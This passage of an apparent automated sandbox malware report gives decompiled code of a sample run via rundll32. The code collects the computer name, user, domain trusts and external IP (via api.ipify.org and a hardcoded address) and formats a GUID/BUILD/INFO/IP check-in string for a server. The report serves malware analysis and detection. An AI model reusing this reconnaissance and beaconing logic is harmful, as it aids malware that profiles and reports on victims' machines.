                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02838DF8), ref: 02838DBF
                          • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02838DD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$Module$AtomCurrentErrorGlobalHandleLoadMode$CapsCharClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryNameProcessRegisterReleaseSectionThread
                          • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                          • API String ID: 1913790723-1126952177
                          • Opcode ID: 2d9be5d0fed8e0c34a2637c65070092e1732ee6760d760ced4d7cc30259f0aee
                          • Instruction ID: 3588d25cb63c3cd95a4c6e9994dfe99c86123aa41b9eaa6f1399290d0780ebc9
                          • Opcode Fuzzy Hash: 2d9be5d0fed8e0c34a2637c65070092e1732ee6760d760ced4d7cc30259f0aee
                          • Instruction Fuzzy Hash: C24160BCD402459FCB02EFB8E84994E77FAEF19300B505865E501DB380DB79A914CF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 89%
                          			E0281C1EC(intOrPtr __eax, void* __edi) {
                          				intOrPtr _v8;
                          				char _v9;
                          				struct tagLOGFONTA _v69;
                          				struct tagLOGFONTA _v189;
                          				struct tagLOGFONTA _v249;
                          				void _v409;
                          				void* _t32;
                          				void* _t41;
                          				intOrPtr _t52;
                          				struct HFONT__* _t55;
                          				struct HFONT__* _t60;
                          				struct HFONT__* _t65;
                          				intOrPtr _t69;
                          				intOrPtr _t71;
                          				void* _t86;
                          				void* _t88;
                          				void* _t89;
                          				intOrPtr _t90;
                          
                          				_t86 = __edi;
                          				_t88 = _t89;
                          				_t90 = _t89 + 0xfffffe68;
                          				_v8 = __eax;
                          				_v9 = 0;
                          				if( *0x2865b58 != 0) {
                          					_t71 =  *0x2865b58; // 0x41d1544
                          					_t3 = _t71 + 0x88; // 0x1
                          					_v9 =  *_t3;
                          				}
                          				_push(_t88);
                          				_push(0x281c349);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t90;
                          				if( *0x2865b58 != 0) {
                          					_t69 =  *0x2865b58; // 0x41d1544
                          					E0281EC60(_t69, 0);
                          				}
                          				if(SystemParametersInfoA(0x1f, 0x3c,  &_v69, 0) == 0) {
                          					_t32 = GetStockObject(0xd);
                          					_t10 = _v8 + 0x84; // 0x7681089
                          					E027F7694( *_t10, _t32, _t86);
                          				} else {
                          					_t65 = CreateFontIndirectA( &_v69); // executed
                          					_t8 = _v8 + 0x84; // 0x7681089
                          					E027F7694( *_t8, _t65, _t86);
                          				}
                          				_v409 = 0x154;
                          				if(SystemParametersInfoA(0x29, 0,  &_v409, 0) == 0) {
                          					_t20 = _v8 + 0x80; // 0x6459595a
                          					E027F7778( *_t20, 8);
                          					_t41 = GetStockObject(0xd);
                          					_t22 = _v8 + 0x88; // 0x8d0281d7
                          					E027F7694( *_t22, _t41, _t86);
                          				} else {
                          					_t55 = CreateFontIndirectA( &_v189);
                          					_t15 = _v8 + 0x80; // 0x6459595a
                          					E027F7694( *_t15, _t55, _t86);
                          					_t60 = CreateFontIndirectA( &_v249);
                          					_t18 = _v8 + 0x88; // 0x8d0281d7
                          					E027F7694( *_t18, _t60, _t86);
                          				}
                          				_t24 = _v8 + 0x80; // 0x6459595a
                          				E027F74D8( *_t24, 0xff000017);
                          				_t26 = _v8 + 0x88; // 0x8d0281d7
                          				E027F74D8( *_t26, 0xff000007);
                          				 *[fs:eax] = 0xff000007;
                          				_push(0x281c350);
                          				if( *0x2865b58 != 0) {
                          					_t52 =  *0x2865b58; // 0x41d1544
                          					return E0281EC60(_t52, _v9);
                          				}
                          				return 0;
                          			}

                          APIs
                          • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 0281C240
                          • CreateFontIndirectA.GDI32(?), ref: 0281C24D
                          • GetStockObject.GDI32(0000000D), ref: 0281C266
                            • Part of subcall function 027F7778: MulDiv.KERNEL32(00000000,?,00000048), ref: 027F7785
                          • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0281C292
                          • CreateFontIndirectA.GDI32(?), ref: 0281C2A2
                          • CreateFontIndirectA.GDI32(?), ref: 0281C2BE
                          • GetStockObject.GDI32(0000000D), ref: 0281C2EA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                          • String ID:
                          • API String ID: 2891467149-0
                          • Opcode ID: e6758a2f0dcd606444bc82707363902cdfa0acd15c7327071679bb322703b20b
                          • Instruction ID: d901b259e43450d93b3496ff3863e06334eae83cc8d0b973bb9df38a43398126
                          • Opcode Fuzzy Hash: e6758a2f0dcd606444bc82707363902cdfa0acd15c7327071679bb322703b20b
                          • Instruction Fuzzy Hash: 99318D38A442489FEB56EBA8D889FAD77FAAB08700F5544F1E608E7390DB709D04CF11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 42d3400-42d3428 call 42d14a0 GetModuleHandleA 212 42d342e-42d3444 GetProcAddress 209->212 213 42d342a-42d342c 209->213 215 42d344f-42d3453 GetSystemInfo 212->215 216 42d3446-42d344d GetNativeSystemInfo 212->216 214 42d346b-42d346e 213->214 217 42d3459-42d3460 215->217 216->217 218 42d3469 217->218 219 42d3462-42d3467 217->219 218->214 219->214
                          C-Code - Quality: 75%
                          			E042D3400() {
                          				struct HINSTANCE__* _v8;
                          				_Unknown_base(*)()* _v12;
                          				struct _SYSTEM_INFO _v48;
                          
                          				E042D14A0( &_v48, 0, 0x24);
                          				_v8 = GetModuleHandleA("kernel32.dll");
                          				if(_v8 != 0) {
                          					_v12 = GetProcAddress(_v8, "GetNativeSystemInfo");
                          					if(_v12 == 0) {
                          						GetSystemInfo( &_v48);
                          					} else {
                          						_v12( &_v48);
                          					}
                          					if((_v48.dwOemId & 0x0000ffff) != 9) {
                          						return 0;
                          					} else {
                          						return 1;
                          					}
                          				}
                          				return 0;
                          			}

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,042D1B21), ref: 042D341B
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 042D3437
                          • GetNativeSystemInfo.KERNEL32(?), ref: 042D344A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleInfoModuleNativeProcSystem
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 3469989633-192647395
                          • Opcode ID: 66ed67831d481e2339f9dcbe2361a92a7845a5cce31d55b0f90a6e1cfae2911f
                          • Instruction ID: 6a5536dca4f46574cb9d7b3fdb3f9244e600345e580de5f45bf7cf24a99009a0
                          • Opcode Fuzzy Hash: 66ed67831d481e2339f9dcbe2361a92a7845a5cce31d55b0f90a6e1cfae2911f
                          • Instruction Fuzzy Hash: 2C013135F24208EBCB04EFF8D8497EDB778EB08715F108555E901B3180E7B8A684DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 220 42d3000-42d301e OpenProcess 221 42d3027-42d303c OpenProcessToken 220->221 222 42d3020-42d3022 220->222 224 42d303e-42d3040 221->224 225 42d3045-42d3062 GetTokenInformation 221->225 223 42d30e7-42d30ea 222->223 224->223 226 42d306f-42d3071 225->226 227 42d3064-42d306d GetLastError 225->227 226->223 227->226 228 42d3073-42d30a9 call 42d1390 GetTokenInformation 227->228 231 42d30d8-42d30e4 call 42d13d0 228->231 232 42d30ab-42d30cf LookupAccountSidA 228->232 231->223 232->231 233 42d30d1 232->233 233->231
                          C-Code - Quality: 100%
                          			E042D3000(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
                          				long _v8;
                          				void* _v12;
                          				void* _v16;
                          				void* _v20;
                          				void* _v24;
                          				union _TOKEN_INFORMATION_CLASS _v28;
                          				union _SID_NAME_USE _v32;
                          				int _t31;
                          				int _t37;
                          				int _t43;
                          
                          				_v12 = OpenProcess(0x400, 0, _a4);
                          				if(_v12 != 0) {
                          					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) {
                          						_v8 = 0;
                          						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed
                          						if(_t31 != 0 || GetLastError() != 0x7a) {
                          							return 0;
                          						} else {
                          							_v24 = E042D1390(_v8);
                          							_v20 = _v24;
                          							_v28 = 0;
                          							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed
                          							if(_t37 != 0) {
                          								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
                          								if(_t43 != 0) {
                          									_v28 = 1;
                          								}
                          							}
                          							E042D13D0(_v24);
                          							return _v28;
                          						}
                          					}
                          					return 0;
                          				}
                          				return 0;
                          			}














                          APIs
                          • OpenProcess.KERNEL32(00000400,00000000,?,?,042D2E45,?,?,00000104,?,00000104), ref: 042D3011
                          • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,042D2E45,?,?,00000104), ref: 042D3034
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenProcess$Token
                          • String ID:
                          • API String ID: 2935449343-0
                          • Opcode ID: 8f756d990a35a04452e1589c451821e6a46e457bbac1431f7b40fd499ed9b7b8
                          • Instruction ID: c599ebdf473c171294246533d35e892961e86a04394a548ae2d621e8ca240817
                          • Opcode Fuzzy Hash: 8f756d990a35a04452e1589c451821e6a46e457bbac1431f7b40fd499ed9b7b8
                          • Instruction Fuzzy Hash: D8312CB5F10209AFDB04DFE4DC85FBEB7B8AB48705F108558EA05E7280E775AA44CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 236 42d2520-42d2535 237 42d254d-42d255d call 42d1fe0 236->237 238 42d2537-42d254b lstrcpyA 236->238 241 42d2562-42d2568 237->241 239 42d25aa-42d25ad 238->239 242 42d258a-42d25a8 lstrcpyA 241->242 243 42d256a-42d2588 lstrcpyA 241->243 242->239 243->239
                          C-Code - Quality: 100%
                          			E042D2520(void* __ecx, CHAR* _a4) {
                          				char _v8;
                          				void* _t10;
                          
                          				if( *0x042D7280 == 0) {
                          					_t10 = E042D1FE0("http://api.ipify.org", "102.129.143.14", 0x20,  &_v8); // executed
                          					if(_t10 != 1) {
                          						 *((char*)(0x42d7280)) = 0;
                          						lstrcpyA(_a4, "0.0.0.0");
                          						return 0;
                          					}
                          					 *((char*)(_v8 + 0x42d7280)) = 0;
                          					lstrcpyA(_a4, "102.129.143.14");
                          					return 1;
                          				}
                          				lstrcpyA(_a4, "102.129.143.14");
                          				return 1;
                          			}






                          APIs
                          • lstrcpyA.KERNEL32(042D1AD9,102.129.143.14,?,?,042D1AD9,?,?), ref: 042D2540
                          • lstrcpyA.KERNEL32(042D1AD9,102.129.143.14,?,?,042D1AD9,?,?), ref: 042D257D
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: 0.0.0.0$102.129.143.14$http://api.ipify.org
                          • API String ID: 3722407311-3804530074
                          • Opcode ID: 84c7cf088e994eeb734b961846980cd6c8c61e10ee2c2ab5064667f5a2a049a6
                          • Instruction ID: 0bb392b68f2c01df501e35792473f58666c293e163d2ee4a62262e3d28f9fffb
                          • Opcode Fuzzy Hash: 84c7cf088e994eeb734b961846980cd6c8c61e10ee2c2ab5064667f5a2a049a6
                          • Instruction Fuzzy Hash: 0C01F934724241EBD7189EA8D81DFA97BA8EF44740F404294F504DB281DABFF9448BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 94%
                          			E0281CD08(intOrPtr __ecx, char __edx) {
                          				intOrPtr _v8;
                          				char _v9;
                          				intOrPtr _v16;
                          				char* _v20;
                          				char _v276;
                          				void* __ebp;
                          				intOrPtr _t78;
                          				intOrPtr _t81;
                          				intOrPtr _t82;
                          				struct HINSTANCE__** _t100;
                          				struct HICON__* _t102;
                          				intOrPtr _t107;
                          				struct HINSTANCE__** _t109;
                          				char* _t125;
                          				intOrPtr _t135;
                          				intOrPtr* _t143;
                          				intOrPtr* _t144;
                          				intOrPtr _t145;
                          				char _t148;
                          				void* _t169;
                          				void* _t170;
                          
                          				_t148 = __edx;
                          				_t145 = __ecx;
                          				if(__edx != 0) {
                          					_t170 = _t170 + 0xfffffff0;
                          					_t78 = E027D3570(_t78, _t169);
                          				}
                          				_v16 = _t145;
                          				_v9 = _t148;
                          				_v8 = _t78;
                          				E027F3854(_v16, 0);
                          				_t81 =  *0x2864528; // 0x2863594
                          				if( *((short*)(_t81 + 2)) == 0) {
                          					_t144 =  *0x2864528; // 0x2863594
                          					 *((intOrPtr*)(_t144 + 4)) = _v8;
                          					 *_t144 = E0281E6B0;
                          				}
                          				_t82 =  *0x28645f4; // 0x286359c
                          				if( *((short*)(_t82 + 2)) == 0) {
                          					_t143 =  *0x28645f4; // 0x286359c
                          					 *((intOrPtr*)(_t143 + 4)) = _v8;
                          					 *_t143 = E0281E8B8;
                          				}
                          				 *((char*)(_v8 + 0x34)) = 0;
                          				 *((intOrPtr*)(_v8 + 0x90)) = E027D31DC(1);
                          				 *((intOrPtr*)(_v8 + 0xa8)) = E027D31DC(1);
                          				 *((intOrPtr*)(_v8 + 0x60)) = 0;
                          				 *((intOrPtr*)(_v8 + 0x84)) = 0;
                          				 *((intOrPtr*)(_v8 + 0x5c)) = 0xff000018;
                          				 *((intOrPtr*)(_v8 + 0x78)) = 0x1f4;
                          				 *((char*)(_v8 + 0x7c)) = 1;
                          				 *((intOrPtr*)(_v8 + 0x80)) = 0;
                          				 *((intOrPtr*)(_v8 + 0x74)) = 0x9c4;
                          				 *((char*)(_v8 + 0x88)) = 0;
                          				 *((char*)(_v8 + 0x9d)) = 1;
                          				 *((char*)(_v8 + 0xb4)) = 1;
                          				 *((intOrPtr*)(_v8 + 0x98)) = E027FDE00(1);
                          				_t100 =  *0x2864424; // 0x2865030
                          				_t102 = LoadIconA( *_t100, "MAINICON"); // executed
                          				E027FE1D0( *((intOrPtr*)(_v8 + 0x98)), _t102);
                          				_t107 =  *((intOrPtr*)(_v8 + 0x98));
                          				 *((intOrPtr*)(_t107 + 0x14)) = _v8;
                          				 *((intOrPtr*)(_t107 + 0x10)) = E0281EF78;
                          				_t109 =  *0x2864424; // 0x2865030
                          				GetModuleFileNameA( *_t109,  &_v276, 0x100); // executed
                          				OemToCharA( &_v276,  &_v276);
                          				_v20 = E027DC9DC(0x5c);
                          				if(_v20 != 0) {
                          					E027D8BC4( &_v276, _v20 + 1);
                          				}
                          				_v20 = E027DCA04( &_v276, 0x2e);
                          				if(_v20 != 0) {
                          					 *_v20 = 0;
                          				}
                          				CharLowerA( &(( &_v276)[1])); // executed
                          				E027D4358(_v8 + 0x8c, 0x100,  &_v276);
                          				_t125 =  *0x28642c0; // 0x2865038
                          				if( *_t125 == 0) {
                          					E0281D0B8(_v8, 0x100);
                          				}
                          				 *((char*)(_v8 + 0x59)) = 1;
                          				 *((char*)(_v8 + 0x5a)) = 1;
                          				 *((char*)(_v8 + 0x5b)) = 1;
                          				 *((char*)(_v8 + 0x9e)) = 1;
                          				 *((intOrPtr*)(_v8 + 0xa0)) = 0;
                          				E0281F1A0(_v8, 0x100);
                          				E0281FD14(_v8);
                          				_t135 = _v8;
                          				if(_v9 != 0) {
                          					E027D35C8(_t135);
                          					_pop( *[fs:0x0]);
                          				}
                          				return _v8;
                          			}

























                          APIs
                          • LoadIconA.USER32(00000000,MAINICON), ref: 0281CE21
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000,MAINICON), ref: 0281CE60
                          • OemToCharA.USER32(?,?), ref: 0281CE73
                          • CharLowerA.USER32(?,00000000,?,00000100,00000000,MAINICON), ref: 0281CEC1
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Char$FileIconLoadLowerModuleName
                          • String ID: MAINICON
                          • API String ID: 3935243913-2283262055
                          • Opcode ID: 1972e42e3a2752210df03c85c87f0a2d0f99a43b540fa414abdc102038032813
                          • Instruction ID: 707ead5e8c26d2166e63cbd06d5586874ce315f185ce6d70eb011121acecc9bb
                          • Opcode Fuzzy Hash: 1972e42e3a2752210df03c85c87f0a2d0f99a43b540fa414abdc102038032813
                          • Instruction Fuzzy Hash: 14713578A00248DFDB05DFA8C589B9DBBF6AF09304F1484E5D808AB3A2C771AE44DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 95%
                          			E042D1AA0(intOrPtr __edx, void* __eflags, void* _a4, intOrPtr _a8, DWORD* _a12) {
                          				intOrPtr _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				char _v68;
                          				char _v324;
                          				char _v2372;
                          				char _v6468;
                          				intOrPtr _t47;
                          				intOrPtr _t56;
                          				char* _t63;
                          				intOrPtr _t66;
                          				intOrPtr _t69;
                          				intOrPtr _t70;
                          				intOrPtr _t71;
                          				char* _t72;
                          				void* _t75;
                          				char* _t89;
                          				intOrPtr _t95;
                          				char* _t104;
                          				intOrPtr _t106;
                          				void* _t110;
                          				void* _t113;
                          				void* _t114;
                          
                          				_t95 = __edx;
                          				E042D1420(0x1940);
                          				_v12 = GetVersion();
                          				_t47 = E042D2630(_t95); // executed
                          				_v32 = _t47;
                          				_v28 = _t95;
                          				E042D30F0( &_v324); // executed
                          				E042D2520( &_v68,  &_v68); // executed
                          				E042D23C0( &_v2372); // executed
                          				_t113 = _t110 + 0xc;
                          				_v20 = _v12 & 0xff;
                          				_v16 = (_v12 & 0xffff) >> 0x00000008 & 0xff;
                          				_t56 = E042D3400(); // executed
                          				_v36 = _t56;
                          				if(_v36 != 1) {
                          					_push(_v16);
                          					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _v32, _v28, E042D25B0( &_v68),  &_v324,  &_v2372,  &_v68, _v20);
                          					_t114 = _t113 + 0x28;
                          				} else {
                          					_push(_v16);
                          					_t75 = E042D25B0( &_v324); // executed
                          					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _v32, _v28, _t75,  &_v324,  &_v2372,  &_v68, _v20);
                          					_t114 = _t113 + 0x28;
                          				}
                          				if( *0x42d72a0 == 0) {
                          					_t71 = E042D1390(0x400);
                          					_t114 = _t114 + 4;
                          					 *0x42d72a0 = _t71;
                          					_t72 =  *0x42d72a0; // 0x2960a78
                          					 *_t72 = 0;
                          				}
                          				_v24 = 1;
                          				while(_v24 == 1) {
                          					_t63 =  *0x42d72a0; // 0x2960a78
                          					_t87 =  *_t63;
                          					if( *_t63 == 0) {
                          						_t106 =  *0x42d72a0; // 0x2960a78
                          						_t70 = E042D2660(_t87, _t106);
                          						_t114 = _t114 + 4;
                          						_v24 = _t70;
                          					}
                          					_t89 =  *0x42d72a0; // 0x2960a78
                          					_t66 = E042D28D0(_t89,  &_v6468, _a4, _a8, _a12); // executed
                          					_t114 = _t114 + 0x14;
                          					_v8 = _t66;
                          					if(_v8 == 1) {
                          						_t69 = E042D1A00(_t89, _a4);
                          						_t114 = _t114 + 4;
                          						_v8 = _t69;
                          					}
                          					if(_v8 != 1) {
                          						_t104 =  *0x42d72a0; // 0x2960a78
                          						 *_t104 = 0;
                          						continue;
                          					} else {
                          						return 1;
                          					}
                          				}
                          				return 0;
                          			}
































                          APIs
                          • GetVersion.KERNEL32(?,042D18CD,?,00100000,?), ref: 042D1AAD
                            • Part of subcall function 042D30F0: GetComputerNameA.KERNEL32(?,00000104), ref: 042D311A
                            • Part of subcall function 042D30F0: lstrcatA.KERNEL32(00100000,?), ref: 042D312F
                            • Part of subcall function 042D30F0: lstrcatA.KERNEL32(00100000, @ ), ref: 042D313E
                            • Part of subcall function 042D30F0: lstrcatA.KERNEL32(00100000,?), ref: 042D3162
                            • Part of subcall function 042D2520: lstrcpyA.KERNEL32(042D1AD9,102.129.143.14,?,?,042D1AD9,?,?), ref: 042D2540
                            • Part of subcall function 042D23C0: DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,042D1AE8,?,?,042D1AE8,?,?,?), ref: 042D23E1
                            • Part of subcall function 042D3400: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,042D1B21), ref: 042D341B
                          • wsprintfA.USER32 ref: 042D1B5E
                          • wsprintfA.USER32 ref: 042D1B9D
                          Strings
                          • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32), xrefs: 042D1B91
                          • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), xrefs: 042D1B52
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$wsprintf$ComputerDomainEnumerateHandleModuleNameTrustsVersionlstrcpy
                          • String ID: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
                          • API String ID: 768865819-2171647522
                          • Opcode ID: aef253e4e2a0bbf2f8ece8bacbb7bd6afd4ff35a3b0cbe631e0a7de989b1867d
                          • Instruction ID: abb6a72bab56dc269a80ab9e11f82453b5ddf7339499b9b2d90b2bf68e6d913b
                          • Opcode Fuzzy Hash: aef253e4e2a0bbf2f8ece8bacbb7bd6afd4ff35a3b0cbe631e0a7de989b1867d
                          • Instruction Fuzzy Hash: 06516FB2E10259DFEB18DF98D854EFE77B8FF48304F04816DE60697240E638AA55CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 324 42d30f0-42d3122 GetComputerNameA 325 42d3135-42d3155 lstrcatA call 42d2df0 324->325 326 42d3124-42d312f lstrcatA 324->326 329 42d3168-42d3170 325->329 330 42d3157-42d3162 lstrcatA 325->330 326->325 330->329
                          C-Code - Quality: 100%
                          			E042D30F0(CHAR* _a4) {
                          				long _v8;
                          				char _v268;
                          				char _v528;
                          				int _t14;
                          				void* _t16;
                          
                          				 *_a4 = 0;
                          				_v8 = 0x104;
                          				_t14 = GetComputerNameA( &_v268,  &_v8);
                          				_t31 = _t14;
                          				if(_t14 != 0) {
                          					lstrcatA(_a4,  &_v268);
                          				}
                          				lstrcatA(_a4, " @ ");
                          				_t16 = E042D2DF0(_t31,  &_v528); // executed
                          				if(_t16 != 0) {
                          					lstrcatA(_a4,  &_v528);
                          				}
                          				return 1;
                          			}









                          APIs
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 042D311A
                          • lstrcatA.KERNEL32(00100000,?), ref: 042D312F
                          • lstrcatA.KERNEL32(00100000, @ ), ref: 042D313E
                          • lstrcatA.KERNEL32(00100000,?), ref: 042D3162
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$ComputerName
                          • String ID: @
                          • API String ID: 2583549208-203157567
                          • Opcode ID: 5c00926960206df227cd930782082c1d82a0025b76069921023ffdfd8b9790ef
                          • Instruction ID: 757a8ad24220647803832f6b96876a623447a539cd28e0708d695b9d29b0e86b
                          • Opcode Fuzzy Hash: 5c00926960206df227cd930782082c1d82a0025b76069921023ffdfd8b9790ef
                          • Instruction Fuzzy Hash: D60186B5B01349ABDB14EFA8D848BDA777CEB48301F004198F949D7241DB79EA84CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 331 42d23c0-42d23e9 DsEnumerateDomainTrustsA 332 42d23eb-42d23ed 331->332 333 42d23f2-42d23f6 331->333 334 42d2487-42d248a 332->334 335 42d23f8-42d23fd 333->335 336 42d2402-42d2409 333->336 335->334 337 42d2414-42d241a 336->337 338 42d241c-42d2427 337->338 339 42d2482 337->339 340 42d244d-42d2459 338->340 341 42d2429-42d2447 lstrcatA * 2 338->341 339->334 342 42d245b-42d247a lstrcatA * 2 340->342 343 42d2480 340->343 341->340 342->343 343->337
                          C-Code - Quality: 75%
                          			E042D23C0(CHAR* _a4) {
                          				signed int _v8;
                          				char _v12;
                          				char _v16;
                          				char* _t30;
                          
                          				 *_a4 = 0;
                          				_t30 =  &_v16;
                          				__imp__DsEnumerateDomainTrustsA(0, 0x3f,  &_v12, _t30); // executed
                          				if(_t30 == 0) {
                          					if(_v16 != 0) {
                          						_v8 = 0;
                          						while(_v8 < _v16) {
                          							if( *(_v12 + _v8 * 0x2c) != 0) {
                          								lstrcatA(_a4,  *(_v12 + _v8 * 0x2c));
                          								lstrcatA(_a4, ";");
                          							}
                          							if( *((intOrPtr*)(_v12 + 4 + _v8 * 0x2c)) != 0) {
                          								_t26 = 4 + _v8 * 0x2c; // 0xff25f845
                          								lstrcatA(_a4,  *(_v12 + _t26));
                          								lstrcatA(_a4, ";");
                          							}
                          							_v8 = _v8 + 1;
                          						}
                          						return 1;
                          					}
                          					return 1;
                          				}
                          				return 0;
                          			}







                          APIs
                          • DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,042D1AE8,?,?,042D1AE8,?,?,?), ref: 042D23E1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DomainEnumerateTrusts
                          • String ID:
                          • API String ID: 4051863571-0
                          • Opcode ID: bf7abdec21d3c3aa5a667e1ea5ecaebc64e18272fd1d651cf4a554e0f1d8a127
                          • Instruction ID: abecbe79fc7ab9cd4df432f4c78f94912a686f9d5ee09011c4347916abdaf7e2
                          • Opcode Fuzzy Hash: bf7abdec21d3c3aa5a667e1ea5ecaebc64e18272fd1d651cf4a554e0f1d8a127
                          • Instruction Fuzzy Hash: F1214F31B21209EBCB08DF98D988FADBB79EB44301F108198E5059B291D774EA81DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D2DF0(void* __eflags, CHAR* _a4) {
                          				long _v8;
                          				long _v12;
                          				long _v16;
                          				char _v276;
                          				char _v536;
                          				long _t16;
                          				void* _t20;
                          
                          				_t16 = E042D2E90("explorer.exe"); // executed
                          				_v16 = _t16;
                          				_v12 = 0x104;
                          				_v8 = 0x104;
                          				 *_a4 = 0;
                          				_t20 = E042D3000(_v16,  &_v536, _v12,  &_v276, _v8); // executed
